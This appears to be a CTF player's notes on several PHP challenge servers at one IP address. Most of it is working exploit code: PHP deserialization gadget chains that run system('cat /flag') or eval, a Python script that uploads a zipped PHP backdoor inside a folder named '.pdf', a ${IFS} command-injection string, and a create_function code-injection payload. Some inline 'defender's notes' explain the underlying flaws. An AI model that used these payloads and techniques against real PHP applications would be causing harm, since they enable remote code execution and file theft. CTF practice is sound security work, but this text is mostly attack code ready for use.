http://47.101.176.40:11114/
<?php
// Strings stored into the innermost QMRb7 object's ->a and ->b below.
$command="system";
$argv='cat ./flag.php';
// Plain property bag; its serialized form carries whatever ->a / ->b hold.
// The class and property names presumably mirror those the receiving
// unserialize() side declares — not verifiable from this file.
class QMRb7
{
public $a;
public $b;
}
// Plain property bag; ->a is given an MGkk8 instance below.
class KOkjs
{
public $a;
public $b;
}
// Plain property bag with a fixed default for ->a; ->b receives a QMRb7 below.
class MGkk8
{
public $a="RPG";
public $b;
}
// Plain property bag; ->a/->b/->c are turned into PHP references below.
class y97pu
{
public $a;
public $b;
public $c;
}
// Assemble the object graph and print its serialized form.
$a=new y97pu();
$a2=new KOkjs();
$a2->a=new MGkk8();
$a2->a->b=new QMRb7();
$a2->a->b->a=$command;
$a2->a->b->b=$argv;
$c=array($a,$a2);
// PHP references: y97pu::$a aliases its own $b, and $c aliases the KOkjs
// object, so serialize() emits back-references rather than copies.
$c[0]->a=&$c[0]->b;
$c[0]->c=&$c[1];
// Defender's note: any receiver that unserialize()s a blob like this
// instantiates whichever classes the string names with sender-chosen
// property values; restrict with the allowed_classes option, or exchange
// JSON instead of serialized PHP.
echo serialize($c).PHP_EOL;

http://47.101.176.40:9004/
绕过rmdir函数：这里is_dir函数检查的是是否为文件夹，而rmdir只能删除空的文件夹。所以可以利用白名单绕过，构造一个名为.pdf的文件夹，里面包含一个php后门：

然后上传压缩包:
# Reads shell.zip, base64-encodes it and POSTs it as the form field `base64`.
import requests
import base64
url='http://47.101.176.40:9004/'
# NOTE(review): `str` shadows the builtin and the file handle is never
# closed; a `with open(...)` block and a different name would fix both.
str=open("shell.zip","rb").read()
str=base64.b64encode(str)
data={
'base64':str,
}
r=requests.post(url,data=data)
# Prints the raw response body (bytes).
print(r.content)
getshell:
http://47.101.176.40:12223/
<?php
namespace Control\State {
// Outermost object of the chain; wraps a MyGenerator in a protected array.
// Protected properties serialize with a "\0*\0" name prefix, which is
// presumably why the output is base64-encoded before printing.
class StopHook {
protected $processes;
public function __construct() {
$this -> processes = array(new \Faker\MyGenerator());
}
}
// Opis Closure autoloader, needed for \Opis\Closure\SerializableClosure
// used in GenerateFile further down this file.
require 'closure/autoload.php';
$payload = new StopHook();
echo base64_encode(serialize($payload));
}
namespace Faker {
// Second link of the chain; holds a GetFile in a protected property.
class MyGenerator {
protected $defaultValue;
public function __construct() {
$this -> defaultValue = new \Method\Func\GetFile();
}
}
}
namespace Method\Func{
// Third link; holds a GetDefault in a private property.
class GetFile {
private $flag;
public function __construct() {
$this -> flag = new \Method\Func\GetDefault();
// `$value` is not declared on this class: a dynamic property
// (deprecated since PHP 8.2).
$this -> value = 'test';
}
}
}
namespace Method\Func{
// Fourth link; holds a GenerateFile and sets its public ->flag.
class GetDefault {
private $source;
public function __construct() {
$this -> source = new \Method\Func\GenerateFile();
$this -> source -> flag = 'myTest';
}
}
}
namespace Method\Func{
// Last link; carries the closure. Plain PHP closures are not serializable,
// which is what the Opis SerializableClosure wrapper is for.
// Defender's note: deserializing such a wrapper from untrusted input means
// the sender chooses the code that runs once the closure is invoked —
// never unserialize() data an external party controls.
class GenerateFile {
public $flag;
protected $buffer;
public function __construct() {
$function = function(){ eval(system('cat /flag')); };
// NOTE(review): `$this->source` is neither declared nor assigned in this
// class (only `$flag` and `$buffer` are); on PHP 8 assigning a property on
// null throws an Error.
$this -> source -> generate = new \Opis\Closure\SerializableClosure($function);
}
}
}

http://47.101.176.40:11112/
<?php
// Root of the chain; ->c is a B instance.
class A{
public $c;
public function __construct()
{
$this->c=new B();
}
}
// Middle link; ->b is a C instance.
class B{
public $b;
public function __construct()
{
$this->b=new C();
}
}
// Sink class. Nothing in this file calls getflag(); it is presumably
// reached by the receiving side's own code.
class C{
public function getflag(){
// readfile() writes the file to output and returns the byte count, so the
// echo prints that count after the contents.
echo readfile("/flag");
}
}
// Serialize the A->B->C graph; urlencode presumably so the `{`, `;` and `"`
// characters of the serialized form survive as a query parameter.
$a=new A();
echo urlencode(serialize($a));

http://47.101.176.40:13334/
<?php
// Outer wrapper. `$test` is not declared: a dynamic property (deprecated
// since PHP 8.2).
class a {
public function __construct($a)
{
$this->test = $a;
}
}
// Abstract base; its private $b is only reachable from this class's own
// methods, hence c::setB() goes through parent::__construct().
abstract class b {
private $b = 1;
public function __construct($a)
{
$this->b = $a;
}
}
// Concrete subclass; the constructor deliberately does not call the parent,
// so b::$b keeps its default until setB() is called.
class c extends b {
private $call;
protected $value;
public function __construct($a,$b)
{
$this->call = $a;
$this->value = $b;
}
// Sets the parent's private $b via the parent constructor.
public function setB($c)
{
parent::__construct($c);
}
}
// Single-value holder used as the first element of the array pairs below.
class d {
public $value;
public function __construct($a) {
$this->value = $a;
}
}
// PHP class names are case-insensitive, so `new C(...)` instantiates `c`.
$c = new C(
[new d("system"),"eval"],
[new d("cat /flag"),"eval"]
);
// b::$b becomes [$c, "eval"], i.e. a self-reference in the serialized graph.
$c->setB([$c,"eval"]);
$exp = new a($c);
// Defender's note: the receiving side presumably treats these property
// values as callables; treating unserialize()d data as code is the root
// issue, and unserialize() of untrusted input should be avoided entirely.
echo base64_encode(serialize($exp));

http://47.101.176.40:10011/
首先使用mv移动fla.php的内容到可读文件中:
c=mv${IFS}fl?.php${IFS}qwqw
然后访问qwqw:

http://47.101.176.40:8778/
<?php
// Outer wrapper; ->var is a B instance.
class A {
public $var;
}
// Holds a function name and its argument; presumably the receiving side
// calls ->func with ->arg.
class B{
public $func;
public $arg;
}
$a=new A;
$a->var=new B;
// Defender's note: create_function() was deprecated in PHP 7.2 and removed
// in 8.0; a reachable call site that takes its code body from external
// data is a finding on its own, independent of this particular payload.
$a->var->func="create_function";
$a->var->arg='return(1);}require(~('.strval(~('php://filter/read=convert.base64-encode/resource=flag.php')).'));//';
echo urlencode(serialize($a));
?>

http://47.101.176.40:3333/index.php
https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html
tnt师傅提示是2022虎符的easyphp